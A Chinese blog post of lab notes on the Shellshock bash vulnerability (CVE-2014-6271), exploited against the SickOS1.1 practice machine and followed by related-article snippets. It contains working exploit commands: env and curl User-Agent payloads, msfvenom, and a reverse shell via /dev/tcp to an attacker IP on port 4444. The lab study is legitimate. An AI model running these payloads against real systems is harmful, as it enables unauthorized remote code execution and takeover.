Shellshock (bash之门)远程代码执行漏洞

已于 2025-04-04 09:06:31 修改
阅读量1k 收藏 18
点赞数 37
文章标签: bash 开发语言
于 2024-12-25 21:00:13 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/NPSM_/article/details/144728203
版权

Shellshock (bash之门)远程代码执行漏洞

声明
B站泷羽sec

笔记的只是方便各位师傅学习知识,以下网站只涉及学习内容,其他的都与本人无关,切莫逾越法律红线,否则后果自负。

✍🏻作者简介:致力于网络安全领域,目前作为一名学习者,很荣幸成为一名分享者,最终目标是成为一名开拓者,很有趣也十分有意义
🤵‍♂️ 个人主页: @One_Blanks
欢迎评论 💬点赞👍🏻 收藏 📂加关注+

  • 关注公众号:泷羽Sec-Blanks
  • 个人:liuyu3366520

目录标题

一、前言

最近在打靶的时候才了解到这一个漏洞,其针对一些靶机版本比较老的机器特别好用,毕竟是一个Shell的远程代码执行,如果能直接反弹Shell就省去了更多的时间。

  • 漏洞编号:CVE-2014-6271

破壳漏洞(ShellShock)的严重性被定义为 10 级(最高),而2020年 4 月爆发的 OpenSSL(心脏滴血)漏洞才 5 级

二、原理

Bash 4.3以及之前的版本在处理某些构造的环境变量时存在安全漏洞,向环境变量值内的函数定义后添加多余的字符串会触发此漏洞,攻击者可利用此漏洞改变或绕过环境限制,以执行任意的shell命令,甚至完全控制目标系统 受到该漏洞影响的bash使用的环境变量是通过函数名称来调用的,以**“(){”开头通过环境变量来定义的。而在处理这样的“函数环境变量”的时候,并没有以函数结尾“}”**为结束,而是一直执行其后的shell命令

三、受影响版本

四、验证与利用

(一)本地主机验证方法
env x='() { :;}; echo Shellshock' bash -c "exit"

如果存在输出Shellshock就说明存在漏洞

  • 利用

可以远程命令执行就可以反弹shell

msfvenom -p cmd/unix/reverse_bash lhost=192.168.25.132 lport=4444 -f raw

生成一下反弹shell的命令,lhost是攻击者的机器、lport是攻击者的端口

bash -c ‘0<&37-;exec 37<>/dev/tcp/192.168.25.132/4444;/bin/sh <&37 >&37 2>&37’

我们直接用单引号里面的命令就可以了,因为这个漏洞已经是bash环境

env x='() { :;}; 0<&37-;exec 37<>/dev/tcp/192.168.25.132/4444;sh <&37 >&37 2>&37' bash -c "exit"
(二)目标主机验证方法

这里以一台靶机为例:SickOS1.1

下载链接:

https://pan.quark.cn/s/4173ca57119e

这里是用nikto扫描到了目标路径暴露出来shellshock漏洞,这里我们直接进行应用

  1. 先验证,如果执行并返回了id命令的结果说明存在漏洞
curl -v http://192.168.25.134/cgi-bin/status -H "User-Agent: () { :; }; echo; /usr/bin/id;exit"

这里成功返回结果。

  1. 接下来进行利用,反弹shell

(1)先开监听

nc -nvlp 4444

(2)远程执行反弹shell

curl -v http://192.168.25.134/cgi-bin/status -H "User-Agent: () { :; }; echo; 0<&37-;exec 37<>/dev/tcp/192.168.25.132/4444;/bin/sh <&37 >&37 2>&37;exit"

成功连接

One_Blanks
关注
详解ShellShock 漏洞复现原理,内附ShellShock的修复方法
Anprou的博客
05-31 6951
Shellshock的原理是利用了Bash在导入环境变量函数时候的漏洞,启动Bash的时候,它不但会导入这个函数,而且也会把函数定义后面的命令执行。
Bash Bug(破壳漏洞Shellshock- CVE-2014-6271
HaSaKing的博客
05-28 1007
破壳漏洞是对全球数以百万计的系统构成威胁的严重安全漏洞。通过理解其原理并学习如何检测和修补,您可以显著提高自己系统的安全性。始终保持系统和软件的最新状态是保护自己免受此类漏洞攻击的关键策略。
shellshock漏洞
m0_57836225的博客
09-10 491
攻击者可以通过向受影响的系统发送恶意构造的环境变量来触发这个漏洞,从而执行任意代码。4. 执行恶意代码:目标系统上的 Bash 在处理请求时,由于漏洞的存在,会错误地执行恶意环境变量中的代码。不同的操作系统有不同的更新方法,通常可以通过系统的软件包管理器进行更新。2. 安全配置:对系统的环境变量设置进行严格的审查和限制。避免使用来自不可信来源的环境变量,并且对输入到系统中的环境变量进行过滤和验证。3. 访问控制:加强对系统的访问控制,限制不必要的用户和进程对系统的访问权限。
【安全】Shellshock漏洞
01-30 558
Shellshock利用了linux环境变量解析问题,进而可以进行针对正常应用启动shell时进行劫持。通过该漏洞,可以实现CGI环境下的RCE,以及针对特权应用的提权。 可以简单理解为,当环境变量可控时,均存在攻击场景。如此看来,该漏洞危害极大,攻击场景非常广。
LINUX漏洞复现篇之ShellShock漏洞
xf555er的博客
12-06 1162
ShellShock漏洞, 中文称为"破壳漏洞", 是Unix Shell中的安全漏洞在一些网络服务器的部署中, 使用bash来处理某些请求, 允许攻击者通过低版本的bash执行任意Shell命令此漏洞在调用BashShell之前使用payload创建环境变量, 这些环境变量包含Shell代码, 在Shell被调用后代码会被执行bash使用的环境变量是通过函数名称来调用的,以""开头通过环境变量来定义,而在处理这样的恶意的函数环境变量时,并没有以函数结尾 “” 为结束,而是执行其后的恶意shell命令Vul
linux shellshock漏洞,shellshock漏洞分析
weixin_28706923的博客
05-18 366
这是tr0ll2靶机涉及到的东西,先看一下在这个靶机上的过程。我们获取了noob用户的ssh密钥,之后登录却失败了:之后我们输入如下命令:ssh noob@192.168.16.141 -i noob -t '() { :;}; /bin/bash'再次登录,居然成功了:以上就是shellshock攻击,其利用的是bash在导入环境变量函数时候的漏洞,启动bash的时候,它不仅会导入这个函数,也...
Linux Bash远程执行代码漏洞补丁文件详解
在标题中提及的“linux bash远程执行代码漏洞的补丁”,指的是针对bash中特定远程执行代码漏洞的修复软件更新。描述中提供的信息明确指出了一系列与漏洞修复相关的rpm(RPM软件包管理器的格式)文件,这些文件分别...
Bash漏洞-Shellshock浅析.pdf
07-10
Bash漏洞ShellshockBash漏洞,又称为Shellshock,是指在2014年发现的一种严重安全漏洞,影响了广泛使用的Bash shell程序。Bash是Unix-like操作系统,包括Linux和Mac OS X的默认命令行解释器。这个漏洞的存在...
Bash漏洞——Shellshock浅析.pdf
07-10
检测Shellshock漏洞的命令是通过设置一个包含恶意代码的环境变量,然后执行bash命令。如果系统易受攻击,它将显示额外的输出,表示存在Shellshock漏洞。这个漏洞的根源在于Bash在处理环境变量时没有正确地终止,导致...
Shellshock(破壳)系列漏洞简要分析及检测
Traxer的学习之路
03-13 4722
1.漏洞简介2.POC验证2.1 CVE 2014-6271最开始的shell测试脚本如下,主要的代码是第五行,它先使用env命令将() { :;}; echo vulnerable赋值给环境变量x,随后启动一个新的bash进程并执行命令echo test,并将错误信息重定向到null,再查找有无’vulnerable’这个字符串输出,如果输出成功则表示存在漏洞:#!/bin/bash EXITCO
漏洞分析——shellshock实验
郭同学如是说
04-15 2649
Shellshock Attack Lab 前导知识 SHELL:命令行界面的解释器 Linux下常见Shell: Bourne Again Shell(/bin/bash) C Shell(/usr/bin/csh) K Shell(/usr/bin/ksh) Bourne Again Shell(/bin/bash) 查看目前使用的shell是否是/bin/bash: seed@ubuntu:/usr/lib/cgi-bin$ echo $SHELL /bin/bash vim编
shellshock_记住shellshock漏洞
weixin_26636643的博客
08-13 580
shellshockSold) type of OS Command Injection was reported. The Shellshock vulnerability, also known as CVE-2014–6271, allowed attackers to inject their own code into Bash using specially crafted envir...
linux shellshock漏洞,shellshock漏洞原理分析(cve-2014-6271 bash漏洞)
weixin_40003283的博客
05-18 280
shellshock漏洞原理分析(cve-2014-6271 bash漏洞)2014-09-26 10:04:16阅读:0次概述:低于4.3版本的gnu bash存在漏洞,运行本地用户通过构造畸形命令执行额外的代码。细节:bash-4.1/variables.c 的 initialize_shell_variables() 函数负责解析临时环境变量中的函数定义并执行出,未验证特殊的环境变量情况,代...
Shellshock漏洞复现
weixin_44283446的博客
03-23 5078
Shellshock漏洞复现bash说明漏洞原理漏洞复现环境说明漏洞条件漏洞复现 bash说明 Bash是Unix shell的一种。1989年发布第一个正式版本,原先是计划用在GNU操作系统上,但能运行于大多数类Unix系统的操作系统之上。 漏洞原理 目前的Bash使用的环境变量是通过函数名称来调用的,导致漏洞出问题的是以”(){”开头定义的环境变量在命令env中解析成函数后,Bash执行未退出,而是继续解析并执行shell命令,而其核心的原因在于在输入的过滤中没有严格限制边界,也没有做出合法化的参
ShellShock漏洞原理分析
weixin_34037515的博客
05-27 469
9月24日,广泛存在于Linux的bash漏洞曝光。因为此漏洞可以执行远程命令,所以极为危。危害程度可能超过前段时间的心脏流血漏洞漏洞编号CVE-2014-6271,以及打了补丁之后被绕过的CVE-2014-7169,又称ShellShock漏洞漏洞起因: 要是用一句话概括这个漏洞,就是代码和数据没有正确区分。 此次漏洞很像SQL注入,通过特...
黑客必备!Linux Shell Shock漏洞利用和实战
logic1001的博客
04-15 1722
漏洞介绍Shellshock,又称Bashdoor,是在Unix中广泛使用的Bash shell中的一个安全漏洞,首次于2014年9月24日公开。许多互联网守护进程,如网页服务器,使用bash来处理某些命令,从而允许攻击者在易受攻击的Bash版本上执行任意代码。这可使攻击者在未授权的情况下访问计算机系统。——摘自维基百科环境搭建1、 以root权限安装4.1版本的bansh。下载地址:3、链接5、 如果上一步输出vulnerable,那么让/bin/sh指向/bin/bash
ShellShock 攻击实验
最新发布
m0_53304143的博客
01-02 1806
ShellShock 漏洞是一个严重的安全问题,它允许攻击者通过环境变量执行任意代码。本实验通过攻击 Set-UID 程序,展示了如何利用该漏洞获取 root 权限。实验结果表明,即使在没有 setuid 的情况下,攻击者仍然有可能通过其他方式利用该漏洞。设置其为 Set-UID 程序,保证其所有者是 root。```bash$ sudo suShellShock 漏洞,也称为 Bash 漏洞,是一个严重的安全问题,它允许攻击者通过环境变量执行任意代码。
CVE-2014-6271-bash shellshock-破壳漏洞复现
m0_62008601的博客
08-06 3372
这些变量可以包含代码,在shell被调用后会被立即执行。用docker搭建vulhub漏洞靶场,服务启动后,有两个页面http://192.168.217.134:8080/victim.cgi和http://192.168.217.134:8080/safe.cgi。可以看到错误原因都是permission denied,那就是权限不足的原因了,那我们就修改一下权限,让它能够被访问。既然在victim.cgi可以执行命令,那么应该就可以进行反弹shell了,kali开启端口监听,执行反弹shell命令。.
Vulhub靶场-shellshock漏洞复现
weixin_53696027的博客
06-02 307
通过Vulhub复现shellshock漏洞
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值